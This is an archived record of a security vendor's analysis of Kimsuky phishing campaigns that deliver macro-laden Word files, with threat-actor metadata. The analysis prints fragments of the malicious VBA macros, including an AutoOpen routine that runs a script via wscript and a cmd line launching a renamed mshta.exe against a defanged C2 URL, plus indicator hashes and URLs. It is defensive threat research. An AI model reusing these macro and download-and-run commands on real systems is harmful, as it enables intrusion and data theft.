{ "id": "ec6c4e8e-c599-4561-8387-832ef38734c1", "created_at": "2026-04-06T00:16:29.456151Z", "updated_at": "2026-04-10T03:37:41.115745Z", "deleted_at": null, "sha1_hash": "7558a8942a7a3b6a31ed61a0da636e489f5287dc", "title": "Word File Provided as External Link When Replying to Attacker’s Email (Kimsuky)", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3017616, "plain_text": "Word File Provided as External Link When Replying to Attacker’s\r\nEmail (Kimsuky)\r\nBy ATCP\r\nPublished: 2022-07-25 · Archived: 2026-04-05 21:48:26 UTC\r\nThe ASEC analysis team has discovered the continuous distribution of malicious Word files with North Korea-related materials. The types of discovered Word files included the one discussed in the “Overall Organizational\r\nAnalysis Report of 2021 Kimsuky Attack Word Files” (AhnLab TIP) and ‘Word Files Related to Diplomacy\r\nand National Defense Being Distributed‘. Also, there was also a type using mshta.\r\nThe malicious Word files are distributed in various names as shown below.\r\nCV of Kim **(Korean American Organization of **,220711).doc\r\nYang**_** Foundation interim report(220716).doc\r\nConsultation Request.doc\r\nType 1\r\nThe malicious Word file titled ‘Consultation Request.doc’ was most likely distributed through the email shown\r\nbelow. The attacker impersonated a person from a Korean organization to send an email requesting a consultation\r\nfor a report.\r\nhttps://asec.ahnlab.com/en/37396/\r\nPage 1 of 7\n\nThe first attack email does not have any attachments. Only when a user responds favorably to the email does the\r\nattacker sends a reply with a URL for the user to download a malicious Word file.\r\nhttps://asec.ahnlab.com/en/37396/\r\nPage 2 of 7\n\nClicking the link on the second email will display a webpage containing another malicious URL.\r\nClicking the download button will redirect the user to hxxps://accounts.serviceprotect[.]eu/signin/v2/identifier?\r\nhl=kr\u0026passive=true\u0026\u003comitted\u003ertnurl=aHR0cHM6Ly9kb2NzLmdv\u003comitted\u003e. The URL cannot be currently\r\naccessed. Yet judging from the URL, it is likely that it collected login information of users and downloaded a\r\nmalicious Word file from the rtnurl parameter value.\r\nOpening the Word file will show an image asking users to enable macros by clicking the Enable Content button. If\r\nusers comply, the file displays texts related to a consultation request, making it difficult to realize its malicious\r\nhttps://asec.ahnlab.com/en/37396/\r\nPage 3 of 7\n\nfeatures.\r\nThe file contains a VBA macro that connects to a certain URL. Here are some parts of the macro code below.\r\nhttps://asec.ahnlab.com/en/37396/\r\nPage 4 of 7\n\nSub \u003cstrong\u003eReserve\u003c/strong\u003e(pth)\r\n Documents.Add\r\n cnt = \"On Error Resume Next:Set mx = CreateObje\" \u0026 \"ct(\"\"Microsoft.XMLHTTP\"\"):mx.open \"\"GET\"\", \"\"hxxp://asss\r\nSub \u003cstrong\u003eAutoOpen\u003c/strong\u003e()\r\n On Error Resume Next\r\n pw = \"1qaz2wsx\"\r\n Weed pw\r\n obt = \"winmgmts:win32_process\"\r\nSet wm = \u003cstrong\u003eGetObject\u003c/strong\u003e(obt)\r\n pth = \u003cstrong\u003eTemplates\u003c/strong\u003e(1).Path \u0026 \"\\version.ini\"\r\n cd = \"wscript.exe //e:vbscript //b\"\r\nwm.Create cd \u0026 pth\r\nEnd Sub\r\nWhen the macro is run, it creates version.ini in the AppData\\Roaming\\Microsoft\\Templates folder. It then runs the\r\ncreated ini file through wscript.exe.\r\nwscript.exe //e:vbscript //b %AppData%\\Microsoft\\Templates\\version.ini\r\nOn Error Resume Next:Set mx = CreateObject(\"Microsoft.XMLHTTP\"):mx.open \"GET\", \"hxxp://asssambly.mywebcommunity\r\nversion.ini\r\nAs the URL cannot be currently accessed, it is impossible to know what the macro does after. It likely engaged in\r\nmalicious behaviors such as leaking user PC information as mentioned in the previous post ‘Word Document\r\nAttack Targeting Companies Specialized in Carbon Emissions‘.\r\nType 2\r\nType 2 is distributed with a file related to a specific webinar and accesses C2 through mshta. Similar to Type 1, the\r\nWord file shows an image prompting users to enable macros. If users do so, the file shows a following text related\r\nto the webinar with a topic of North Korea.\r\nhttps://asec.ahnlab.com/en/37396/\r\nPage 5 of 7\n\nThe file also contains a VBA macro, which is shown below.\r\nSub \u003cstrong\u003eAutoOpen\u003c/strong\u003e()\r\njsfds = \"cmd /c copy %windir%\\system32\\mshta.exe %tmp%\\gtfmon.exe\"\r\nShell jsfds, 0\r\njsfds = \"cmd /c timeout /t 7 \u003eNUL \u0026\u0026 %tmp%\\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php\"\r\nShell jsfds, 0\r\nEnd Sub\r\nWhen the macro is run, it copies mshta.exe in the TEMP folder as gtfmon.exe and attempts to access a certain\r\nURL using the cmd command.\r\ncmd /c timeout /t 7 \u003eNUL \u0026\u0026 %tmp%\\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php\r\nAgain, the URL cannot be currently accessed and further behaviors cannot be confirmed. Similar to Type 1, the\r\nmacro likely performed malicious behaviors such as leaking user PC information.\r\nAs malicious Word files containing North Korea-related materials are continuously being discovered, users need\r\nto take caution. Since attackers are distributing malicious files by impersonating normal users, one should check\r\nthe email address of the sender and take caution when opening attachments and clicking links.\r\n[File Detection]\r\nDownloader/DOC.Kimsuky\r\nhttps://asec.ahnlab.com/en/37396/\r\nPage 6 of 7\n\nMD5\r\n357ef37979b02b08120895ae5175eb0a\r\n7fe055d5aa72bd50470da61985e12a8a\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//asssambly[.]mywebcommunity[.]org/file/upload/list[.]php?query=1\r\nhttp[:]//freunkown1[.]sportsontheweb[.]net/h[.]php\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/37396/\r\nhttps://asec.ahnlab.com/en/37396/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://asec.ahnlab.com/en/37396/" ], "report_names": [ "37396" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434589, "ts_updated_at": 1775792261, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7558a8942a7a3b6a31ed61a0da636e489f5287dc.pdf", "text": "https://archive.orkl.eu/7558a8942a7a3b6a31ed61a0da636e489f5287dc.txt", "img": "https://archive.orkl.eu/7558a8942a7a3b6a31ed61a0da636e489f5287dc.jpg" } }